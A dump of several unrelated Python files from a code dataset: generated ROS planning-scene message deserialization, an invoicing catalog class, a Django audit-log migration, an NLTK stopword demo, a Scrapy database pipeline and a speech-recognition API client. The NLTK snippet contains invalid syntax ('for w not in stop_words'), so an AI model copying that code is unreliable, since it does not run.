_x = self
buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))
_x = self.planning_scene.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_map.boxes:
_v194 = val1.center
_x = _v194
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v195 = val1.extents
_x = _v195
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v196 = val1.axis
_x = _v196
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_x = self
start = end
end += 8
(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v197 = val1.position
_x = _v197
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v198 = val1.orientation
_x = _v198
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v199 = val1.header
start = end
end += 4
(_v199.seq,) = _struct_I.unpack(str[start:end])
_v200 = _v199.stamp
_x = _v200
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v199.frame_id = str[start:end].decode('utf-8')
else:
_v199.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v201 = val1.transform
_v202 = _v201.translation
_x = _v202
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v203 = _v201.rotation
_x = _v203
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)
val1.enabled = map(bool, val1.enabled)
self.planning_scene.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v204 = val1.shape
start = end
end += 1
(_v204.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v204.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v204.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v204.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v204.vertices.append(val3)
_v205 = val1.pose_stamped
_v206 = _v205.header
start = end
end += 4
(_v206.seq,) = _struct_I.unpack(str[start:end])
_v207 = _v206.stamp
_x = _v207
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v206.frame_id = str[start:end].decode('utf-8')
else:
_v206.frame_id = str[start:end]
_v208 = _v205.pose
_v209 = _v208.position
_x = _v209
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v210 = _v208.orientation
_x = _v210
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v211 = val1.header
start = end
end += 4
(_v211.seq,) = _struct_I.unpack(str[start:end])
_v212 = _v211.stamp
_x = _v212
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v211.frame_id = str[start:end].decode('utf-8')
else:
_v211.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v213 = val1.operation
start = end
end += 1
(_v213.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v214 = val2.position
_x = _v214
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v215 = val2.orientation
_x = _v215
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v216 = val1.object
_v217 = _v216.header
start = end
end += 4
(_v217.seq,) = _struct_I.unpack(str[start:end])
_v218 = _v217.stamp
_x = _v218
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v217.frame_id = str[start:end].decode('utf-8')
else:
_v217.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v216.id = str[start:end].decode('utf-8')
else:
_v216.id = str[start:end]
start = end
end += 4
(_v216.padding,) = _struct_f.unpack(str[start:end])
_v219 = _v216.operation
start = end
end += 1
(_v219.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v216.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v216.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v216.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v220 = val3.position
_x = _v220
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v221 = val3.orientation
_x = _v221
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v216.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v222 = val1.center
_x = _v222
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v223 = val1.extents
_x = _v223
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v224 = val1.axis
_x = _v224
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene.collision_map.boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_b = struct.Struct("<b")
_struct_d = struct.Struct("<d")
_struct_f = struct.Struct("<f")
_struct_3f = struct.Struct("<3f")
_struct_3I = struct.Struct("<3I")
_struct_4d = struct.Struct("<4d")
_struct_2I = struct.Struct("<2I")
_struct_3d = struct.Struct("<3d")
class GetPlanningScene(object):
_type = 'arm_navigation_msgs/GetPlanningScene'
_md5sum = '0a7b07718e4e5c5d35740c730509a151'
_request_class = GetPlanningSceneRequest
_response_class = GetPlanningSceneResponse
|
5,195 | 37feeba8ff682e5998fde4bcba8c37043cb593f2 | # coding=utf-8
from smallinvoice.commons import BaseJsonEncodableObject, BaseService
class Catalog(BaseJsonEncodableObject):
def __init__(self, catalog_type, unit, name, cost_per_unit, vat=0):
self.type = catalog_type
self.unit = unit
self.name = name
self.cost_per_unit = cost_per_unit
self.vat = vat
class CatalogService(BaseService):
name = 'catalog'
|
5,196 | d65d85b4573728ed32ccf987459d5a228e2a8897 | # Generated by Django 3.1.7 on 2021-04-16 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuditLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField(auto_now=True, verbose_name='操作时间')),
('user', models.CharField(max_length=64, verbose_name='操作者')),
('obj', models.TextField(blank=True, null=True, verbose_name='操作对象')),
('operate_type', models.CharField(max_length=32, verbose_name='操作类型')),
('change_message', models.TextField(blank=True, verbose_name='操作信息')),
],
options={
'verbose_name': '操作日志',
'ordering': ['-id'],
},
),
]
|
5,197 | 90f5629ac48edfccea57243ffb6188a98123367d | from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Print Stop words
stop_words = set(stopwords.words("english"))
print(stop_words)
example_text = "This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up"
words = word_tokenize(example_text)
filtered_sentence = []
for w in words:
for w not in stop_words:
filtered_sentence.append(w)
#print filtered sentences
print(filtered_sentence)
#print in a line
filtered_sentence1 = [w for w in words if not w in stop_words]
#print filtered sentences
print(filtered_sentence1)
|
5,198 | 16074fc1824a99b6fd1c4bf113d5b752308e8803 | from sqlalchemy.orm import sessionmaker
from IMDB.spiders.models import IMDB_DATABASE, db_connect, create_table
class ScrapySpiderPipeline(object):
# Bu Fonksiyon Veritabanı bağlantısını ve oturum oluşturucuyu başlatır ve bir İlişkisel Veritabanı tablosu oluşturur.
def __init__(self):
engine = db_connect()
create_table(engine)
self.Session = sessionmaker(bind=engine)
# Bu Fonksiyon Spiderdan Gelen Dataları Models.py Dosyasındaki Model Şablonuna Göre İşleme Sokarak Verileri Database İçine Kaydeder
def process_item(self, item, spider):
session = self.Session()
ım_db = IMDB_DATABASE()
ım_db.MOVIE_CODE = item["MOVIE_CODE"]
ım_db.MOVIE_NAME = item["MOVIE_NAME"]
ım_db.YEAR = item["YEAR"]
ım_db.RANK = item["RANK"]
ım_db.IMDB_RATING = item["IMDB_RATING"]
# Buradaki Try Except istisna blokları datalar kaydedilirken varsa oluşan hataları ayıklayarak bizlere mesaj olarak döner
try:
session.add(ım_db)
session.commit()
except:
session.rollback()
raise
finally:
session.close()
return item
|
5,199 | 421b0c1871350ff541b4e56d1e18d77016884552 | # -*- coding: utf-8 -*-
"""Transcoder with TOSHIBA RECAIUS API."""
import threading
import queue
import time
import numpy as np
from logzero import logger
import requests
import model.key
AUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'
VOICE_URL = 'https://api.recaius.jp/asr/v2/voices'
class Transcoder:
"""Transcoder Class."""
def __init__(self):
"""Constructor."""
logger.info('__init__:Enter')
self._token = None
self.transcript = None
self._queue = queue.Queue()
def start(self, token):
"""Start recognition."""
logger.info('start:Enter')
self._token = token
threading.Thread(target=self._process).start()
def write_stream(self, buf):
"""Write audio stream."""
self._queue.put(buf)
def _process(self):
logger.info('_process:Enter')
token = self._authenticate()['token']
uuid = self._start_recognition(token)['uuid']
logger.info('start transcode')
i = 1
while True:
arr = self._stream_generator()
if(arr is None):
break
# logger.debug(f'{len(arr)} , {self._queue.qsize()}')
inline = np.hstack(arr)
arr_bytes = inline.tobytes('C')
header = {
'Content-Type': 'multipart/form-data',
'X-Token': token
}
files = {
'voice_id': ('', i, ''),
'voice': ('', arr_bytes, 'application/octet-stream')
}
resp = requests.put(
f'{VOICE_URL}/{uuid}', headers=header, files=files)
if(resp.status_code == 200):
logger.debug(resp.json())
result = resp.json()[0]
if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):
self._write_result(result[1])
i = i + 1
self._flush_recognition(uuid, token, i)
while True:
if(self._get_result(uuid, token) is None):
break
time.sleep(0.1)
self._end_recognition(uuid, token)
logger.info('end transcode')
def _authenticate(self):
speechrecog_jajp_id = model.key.RECAIUS_ID
speechrecog_jajp_password = model.key.RECAIUS_PASSWORD
param = {
"speech_recog_jaJP": {
'service_id': speechrecog_jajp_id,
'password': speechrecog_jajp_password
}
}
return requests.post(AUTH_URL, json=param).json()
def _flush_recognition(self, uuid, token, i):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'voice_id': i,
}
resp = requests.put(
f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)
if(resp.status_code == 200):
logger.debug(f'frush result:{resp.json()}')
return resp.json()
else:
logger.debug(f'flush result(status:{resp.status_code})')
def _get_result(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)
if(resp.status_code == 200):
logger.debug(f'get result:{resp.json()}')
return resp.json()
else:
logger.debug(f'get result(status:{resp.status_code})')
def _stream_generator(self):
arr = []
while True:
try:
v = self._queue.get_nowait()
# print(v)
if v is None:
return None
arr.append((v * 32767).astype(np.int16))
except queue.Empty:
if(len(arr) != 0):
break
else:
time.sleep(0.1)
return arr
def _start_recognition(self, token):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'model_id': 1
}
return requests.post(VOICE_URL, headers=header, json=param).json()
def _end_recognition(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)
if(resp.status_code == 204):
logger.debug(f'delete result(status:{resp.status_code})')
def _write_result(self, transcipt):
self.transcript = transcipt
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.